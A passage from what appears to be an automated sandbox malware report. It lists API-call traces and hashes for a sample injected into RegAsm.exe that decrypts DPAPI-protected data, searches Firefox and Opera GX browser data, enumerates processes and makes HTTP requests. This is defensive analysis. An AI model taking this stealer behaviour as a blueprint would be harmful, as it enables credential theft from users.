                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040FBCB: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417274,004265C7), ref: 0040FBD7
                                                                                  • Part of subcall function 0040FBCB: HeapAlloc.KERNEL32(00000000,?,?,?,00417274,004265C7), ref: 0040FBDE
                                                                                  • Part of subcall function 0040FBCB: GetUserNameA.ADVAPI32(00000000,?), ref: 0040FBF2
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                • CloseHandle.KERNEL32(00000000), ref: 004172D5
                                                                                • Sleep.KERNEL32(00001B58), ref: 004172E0
                                                                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,?,00426B18,?,00000000,004265C7), ref: 004172F1
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00417307
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00417315
                                                                                • ExitProcess.KERNEL32 ref: 0041731C
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoadlstrcpy$CloseEventHandleHeapProcess$AllocCreateExitH_prologNameOpenSleepUserlstrcatlstrlen
                                                                                • String ID:
                                                                                • API String ID: 1043047581-0
                                                                                • Opcode ID: 113881885c3839af2b79a56db40bcd2305469b038b667f9b69e4ccdc7c5ab35c
                                                                                • Instruction ID: d94f923eae08acc0ec9c25e643b9a8e0192b3615959a138ccc40586fc2a64efe
                                                                                • Opcode Fuzzy Hash: 113881885c3839af2b79a56db40bcd2305469b038b667f9b69e4ccdc7c5ab35c
                                                                                • Instruction Fuzzy Hash: 38113D71900019BBCB11FBE2DD6ADEEB77DAE55304B50007EF502B24E1DF386A09CA69
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00403A59
                                                                                • ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                • ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                • ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                • lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                • InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                Similarity
                                                                                • API ID: CrackH_prologInternetlstrlen
                                                                                • String ID:
                                                                                • API String ID: 503950642-0
                                                                                • Opcode ID: 0d221dbbc7c0b090ec087e33715908742fb57a3485d1500de3dc28ba3d66cb29
                                                                                • Instruction ID: cc07c141d42f95622a17f2cc37de93049e7409e5d01b43fa4466afa553a2edca
                                                                                • Opcode Fuzzy Hash: 0d221dbbc7c0b090ec087e33715908742fb57a3485d1500de3dc28ba3d66cb29
                                                                                • Instruction Fuzzy Hash: B4114C71D00208ABCB24AFA5D805BDE7F78AF45325F20422AF921A62D0DB385A498B54
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040B1E5
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                  • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                  • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                  • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                  • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                  • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                  • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00425F30,00425C3B), ref: 0040B2A6
                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040B2C2
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 0040AFAF: _EH_prolog.MSVCRT ref: 0040AFB4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                • API String ID: 2813378046-3310892237
                                                                                • Opcode ID: d82d09ade0ba0a4835b3956aae4a2697323b81754fe74cb71676ab1b26c84f39
                                                                                • Instruction ID: bb3a9efdf4450b2767142494be26f7b0dc10ed47a6f8b455ca68a0d11c56a3c9
                                                                                • Opcode Fuzzy Hash: d82d09ade0ba0a4835b3956aae4a2697323b81754fe74cb71676ab1b26c84f39
                                                                                • Instruction Fuzzy Hash: B2715C70905288AADB14FBE5D916BDDBBB4AF19308F50417EE805736C2DB78170CCBA6
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 004064EA
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                • GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,00000000,?,?,00425B9C,?,?,?,00425B97,?), ref: 004065A7
                                                                                  • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,004265B7,004265B6,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                                  • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                                • SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,00425BA0,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00425B9B), ref: 0040661F
                                                                                • LoadLibraryA.KERNEL32(00000000), ref: 0040663A
                                                                                Strings
                                                                                • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0040659B, 004065A0, 004065BA
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcpy$H_prolog$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                • API String ID: 757424748-4027016359
                                                                                • Opcode ID: b1ec59224834b8f79ed32a038f4b7da38d4618f543a9ad0f1e6d2df5f849b41d
                                                                                • Instruction ID: 8db632add1ead28395c1f5c726ee2788193d5f270b99ec1c59b0dc1cdd27b91c
                                                                                • Opcode Fuzzy Hash: b1ec59224834b8f79ed32a038f4b7da38d4618f543a9ad0f1e6d2df5f849b41d
                                                                                • Instruction Fuzzy Hash: C3617270801544EECB25EBA4D915BEDBBB5EB29304F10507EE406736E2DB381A09CF69
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040C18B
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                  • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                  • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                  • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                  • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                  • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                  • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                                • StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040C1DE
                                                                                  • Part of subcall function 00406242: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406262
                                                                                  • Part of subcall function 00406242: LocalAlloc.KERNEL32(00000040,004058F9,?,?,004058F9,00000000,?,?), ref: 00406270
                                                                                  • Part of subcall function 00406242: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406286
                                                                                  • Part of subcall function 00406242: LocalFree.KERNEL32(00000000,?,?,004058F9,00000000,?,?), ref: 00406295
                                                                                • memcmp.MSVCRT ref: 0040C21C
                                                                                  • Part of subcall function 004062A5: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004062C8
                                                                                  • Part of subcall function 004062A5: LocalAlloc.KERNEL32(00000040,?,?), ref: 004062E0
                                                                                  • Part of subcall function 004062A5: LocalFree.KERNEL32(?), ref: 004062FE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Local$Alloc$CryptFile$BinaryFreeH_prologString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
                                                                                • String ID: $DPAPI
                                                                                • API String ID: 2477620391-1819349886
                                                                                • Opcode ID: 548af4ef5a68c1d15bd34a1c9f3b88a4916ae1bc9e092e19947f3fc684f09504
                                                                                • Instruction ID: 7c90c9c52161514f2ce6f88b14c0e6cf6dad8cdca0aeae51f6cfd95d0e4443f7
                                                                                • Opcode Fuzzy Hash: 548af4ef5a68c1d15bd34a1c9f3b88a4916ae1bc9e092e19947f3fc684f09504
                                                                                • Instruction Fuzzy Hash: EA21A272D00109ABCF10ABE5CD429EFBB79AF54314F14027BF901B11D2EA399A958699
                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,00426624,00000000,?,Work Dir: In memory), ref: 0041065F
                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,00426624,00000000,?,Work Dir: In memory,00000000,?), ref: 00410666
                                                                                • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,00426624,00000000,?), ref: 00410694
                                                                                • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,00426624,00000000), ref: 004106B0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AllocOpenProcessQueryValue
                                                                                • String ID: Windows 11
                                                                                • API String ID: 3676486918-2517555085
                                                                                • Opcode ID: 7cca10c1b5c7dd35db0d4f8c6a920e7d0fee12f9d646c557380bc34a9577cd99
                                                                                • Instruction ID: 81a682fe0d96866a8c385725fbf1601ecc6145704a13890b4f9ee07a06a14e80
                                                                                • Opcode Fuzzy Hash: 7cca10c1b5c7dd35db0d4f8c6a920e7d0fee12f9d646c557380bc34a9577cd99
                                                                                • Instruction Fuzzy Hash: F0F06879640215FBEB105BD1DD0AF9A7A7EEB45B04F101075FB01D51A0D7F499509724
                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,0040FBC2,00410673,?,?,?,00414A17,00000000,?,Windows: ,00000000), ref: 0040FB64
                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,0040FBC2,00410673,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,00426624), ref: 0040FB6B
                                                                                • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,0040FBC2,00410673,?,?,?,00414A17,00000000,?,Windows: ), ref: 0040FB89
                                                                                • RegQueryValueExA.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,0040FBC2,00410673,?,?,?,00414A17,00000000), ref: 0040FBA4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AllocOpenProcessQueryValue
                                                                                • String ID: CurrentBuildNumber
                                                                                • API String ID: 3676486918-1022791448
                                                                                • Opcode ID: 5b1574023f8c3e93d255d4511c3bb41a2e12e83297ccb6591afc91b84a13fdcf
                                                                                • Instruction ID: 28640ec94ffd33d2c44419ba2cf0af880b9d8ee060d027bd97fbaf1b7c2936ad
                                                                                • Opcode Fuzzy Hash: 5b1574023f8c3e93d255d4511c3bb41a2e12e83297ccb6591afc91b84a13fdcf
                                                                                • Instruction Fuzzy Hash: C9F03076240214FBFB119BD1DC0BFAE7A7DEB45B04F101069F701A50A0D7B569409B28
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00409143
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                  • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425E0C,?,?,?,00425BF3,00000000), ref: 0040921D
                                                                                • lstrlenA.KERNEL32(00000000), ref: 004093E4
                                                                                • lstrlenA.KERNEL32(00000000), ref: 004093F8
                                                                                • DeleteFileA.KERNEL32(00000000), ref: 0040947A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prologlstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                • String ID:
                                                                                • API String ID: 3423466546-0
                                                                                APIs
                                                                                • GetSystemInfo.KERNEL32(?), ref: 6C7CC947
                                                                                • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C7CC969
                                                                                • GetSystemInfo.KERNEL32(?), ref: 6C7CC9A9
                                                                                • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C7CC9C8
                                                                                • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C7CC9E2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$AllocInfoSystem$Free
                                                                                • String ID:
                                                                                • API String ID: 4191843772-0
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 004102C8
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410303
                                                                                • Process32First.KERNEL32(00000000,00000128), ref: 00410314
                                                                                • Process32Next.KERNEL32(?,00000128), ref: 0041037C
                                                                                • CloseHandle.KERNEL32(?,?,00000000), ref: 00410389
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32lstrcpy
                                                                                • String ID:
                                                                                • API String ID: 599723951-0
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004024F0
                                                                                  • Part of subcall function 0040245C: memset.MSVCRT ref: 00402481
                                                                                  • Part of subcall function 0040245C: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,00000000,?,00000000,00000000), ref: 004024A7
                                                                                  • Part of subcall function 0040245C: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,?,?,00000000,00000000), ref: 004024C1
                                                                                • strcat.MSVCRT(?,00000000,?,?,00000000,00000104), ref: 00402505
                                                                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00402510
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00402517
                                                                                  • Part of subcall function 00402308: ??_U@YAPAXI@Z.MSVCRT ref: 0040238D
                                                                                • memset.MSVCRT ref: 00402540
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$BinaryCryptHeapString$AllocateProcessstrcat
                                                                                • String ID:
                                                                                • API String ID: 3248666761-0
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040D6C0
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                • StrCmpCA.SHLWAPI(00000000,Opera GX,00425C1E,00425C1B,?,?,?), ref: 0040D70A
                                                                                  • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                                  • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425C4E,?,?), ref: 00410CF6
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 0040A893: _EH_prolog.MSVCRT ref: 0040A898
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                                • String ID: #$Opera GX
                                                                                • API String ID: 2625060131-1046280356
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0041332B
                                                                                • lstrlenA.KERNEL32(00000000), ref: 00413348
                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041340C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prologlstrlen
                                                                                • String ID: ERROR
                                                                                • API String ID: 2133942097-2861137601
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0041303F
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 00404F2A: _EH_prolog.MSVCRT ref: 00404F2F
                                                                                  • Part of subcall function 00404F2A: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
                                                                                  • Part of subcall function 00404F2A: StrCmpCA.SHLWAPI(?), ref: 00404FA6
                                                                                  • Part of subcall function 00404F2A: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
                                                                                  • Part of subcall function 00404F2A: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
                                                                                  • Part of subcall function 00404F2A: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
                                                                                  • Part of subcall function 00404F2A: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
                                                                                  • Part of subcall function 00404F2A: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C
                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041309D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: HttpInternet$H_prologOpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                • String ID: ERROR$ERROR
                                                                                • API String ID: 1120091252-2579291623
                                                                                • Opcode ID: 345aea7090713525bc43328569ab8dfd80e6ef4a38db32126cd76269f1d4eab7
